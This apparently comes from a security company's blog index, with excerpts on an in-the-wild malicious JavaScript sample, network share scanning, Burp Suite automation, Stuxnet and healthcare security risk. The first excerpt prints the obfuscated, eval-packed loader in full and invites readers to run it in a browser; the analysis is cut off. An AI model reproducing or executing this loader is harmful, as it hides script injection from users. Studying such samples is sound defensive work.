Today, we observed some potentially dangerous JavaScript client-side code out in the wild. The code, which we went to great lengths to obtain, is reproduced below (the `--` decrements and the `>35` comparison in the packer function were mangled in transit and have been restored):

_0x65f5=["\x36\x3D\x5B\x22\x5C\x6A\x5C\x69\x5C\x61\x5C\x6E\x5C\x38\x5C\x62\x22\x2C\x22\x5C\x68\x5C\x61\x5C\x37\x5C\x6B\x5C\x62\x5C\x37\x5C\x6F\x5C\x66\x5C\x37\x5C\x70\x5C\x37\x5C\x67\x5C\x62\x22\x2C\x22\x5C\x6B\x5C\x38\x5C\x38\x5C\x37\x5C\x67\x5C\x39\x5C\x69\x5C\x65\x5C\x6D\x5C\x66\x5C\x39\x22\x2C\x22\x5C\x71\x5C\x72\x5C\x39\x5C\x6C\x22\x2C\x22\x5C\x6A\x5C\x61\x5C\x68\x22\x2C\x22\x5C\x63\x5C\x63\x5C\x38\x5C\x74\x5C\x79\x5C\x7A\x5C\x41\x5C\x78\x5C\x63\x5C\x65\x5C\x77\x22\x5D\x3B\x64\x3D\x75\x3B\x73\x3D\x64\x5B\x36\x5B\x31\x5D\x5D\x28\x36\x5B\x30\x5D\x29\x3B\x64\x5B\x36\x5B\x33\x5D\x5D\x5B\x36\x5B\x32\x5D\x5D\x28\x73\x29\x3B\x73\x5B\x36\x5B\x34\x5D\x5D\x3D\x36\x5B\x35\x5D\x3B\x76\x28\x30\x29\x3B","\x7C","\x73\x70\x6C\x69\x74","\x7C\x7C\x7C\x7C\x7C\x7C\x5F\x30\x78\x65\x30\x61\x32\x7C\x78\x36\x35\x7C\x78\x37\x30\x7C\x78\x36\x34\x7C\x78\x37\x32\x7C\x78\x37\x34\x7C\x78\x32\x46\x7C\x7C\x78\x36\x38\x7C\x78\x36\x43\x7C\x78\x36\x45\x7C\x78\x36\x33\x7C\x78\x34\x33\x7C\x78\x37\x33\x7C\x78\x36\x31\x7C\x78\x37\x39\x7C\x78\x36\x39\x7C\x78\x34\x39\x7C\x78\x34\x35\x7C\x78\x36\x44\x7C\x78\x36\x32\x7C\x78\x36\x46\x7C\x7C\x78\x33\x33\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x76\x4F\x49\x64\x7C\x78\x37\x41\x7C\x78\x35\x33\x7C\x78\x34\x45\x7C\x78\x32\x45\x7C\x78\x37\x35","","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x72\x65\x70\x6C\x61\x63\x65","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0xf47fx1,_0xf47fx2,_0xf47fx3,_0xf47fx4,_0xf47fx5,_0xf47fx6){_0xf47fx5=function (_0xf47fx3){return (_0xf47fx3>35?String[_0x65f5[5]](_0xf47fx3+29):_0xf47fx3.toString(36));} ;if(!_0x65f5[4][_0x65f5[6]](/^/,String)){while(_0xf47fx3--){_0xf47fx6[_0xf47fx5(_0xf47fx3)]=_0xf47fx4[_0xf47fx3]||_0xf47fx5(_0xf47fx3);} ;_0xf47fx4=[function (_0xf47fx5){return _0xf47fx6[_0xf47fx5];} ];_0xf47fx5=function (){return _0x65f5[7];} ;_0xf47fx3=1;} ;while(_0xf47fx3--){if(_0xf47fx4[_0xf47fx3]){_0xf47fx1=_0xf47fx1[_0x65f5[6]]( new RegExp(_0x65f5[8]+_0xf47fx5(_0xf47fx3)+_0x65f5[8],_0x65f5[9]),_0xf47fx4[_0xf47fx3]);} ;} ;return _0xf47fx1;} (_0x65f5[0],37,37,_0x65f5[3][_0x65f5[2]](_0x65f5[1]),0,{}));

For those brave of heart, you can test and execute it directly by putting it in your URL location bar preceded by javascript: as shown below: The first thing we recognized was the degree …
Using SoftPerfect’s Network Scanner to Scan Your Network for Open Shares
SoftPerfect makes a great, simple and lightweight network scanner that can be used to scan for open shares on your network. The product page is here and the program can be downloaded here. After downloading netscan.exe, double-click it to run the program. (No need to install anything.) First, you’ll need to change the account Network Scanner uses. From the Options menu, select Program Options. Then click the Shares tab and at the bottom of the window select Use specific …
The increasingly sophisticated threat landscape: is your information security program prepared?
The Washington Post reported this morning on the latest development related to the Stuxnet malware. The Stuxnet code was designed from the ground up to attack Supervisory Control and Data Acquisition (SCADA) systems, those used to manage complex industrial networks such as the systems at power plants and chemical manufacturing facilities. The malware, which has been the subject of much discussion over the last month or so in the security and cyber war community, is capable of taking over systems that …
Advanced Burp Suite Automation
By converting Burp Suite Professional’s session files to XML, we were able to automate the analysis of the results with XMLStarlet on the command line. Using the IBurpExtender interface, we have now automated spidering and scanning in Burp as well: BurpExtender.java takes full advantage of the IBurpExtender interface and accepts a starting URL, an output name, and an optional cookie string on the command line. This tool adds the URL’s domain to Burp’s scope and begins spidering the site, saving each …
Worse than useless and some thoughts on cyber war
This week the Economist featured an article about an anti-censorship product called Haystack. The effort was motivated by events surrounding the Iranian opposition movement in 2009, when activists used mobile versions of Twitter and Facebook to upload videos of police brutality and spread news of demonstrations. The Iranian government cracked down by tracing users, blocking services and closing websites, as well as arresting dissenters. Haystack entered the picture earlier this year …
Perspectives on application security and risk management
In my last blog post I discussed information security risk management and why the financial services sector aggressively adopted the practice. My recommendation was that the healthcare industry needs to follow suit to increase the effectiveness and efficiency of its information security programs. It is refreshing to see evidence that this is taking place. Last week at OWASP’s AppSec USA conference, some leaders from the healthcare sector shared their perspectives on information security risk management. The panel session, entitled …
Why information security risk management makes sense in the healthcare industry
Lately I have been thinking about risk in the context of information security and the healthcare industry. I have written an article, which you can find here, about using risk management to help healthcare organizations manage their information security, privacy and compliance programs more effectively and efficiently. For the most part, using risk to manage information security is new territory for the healthcare industry, yet it has been common practice in the financial services sector for more than ten years. …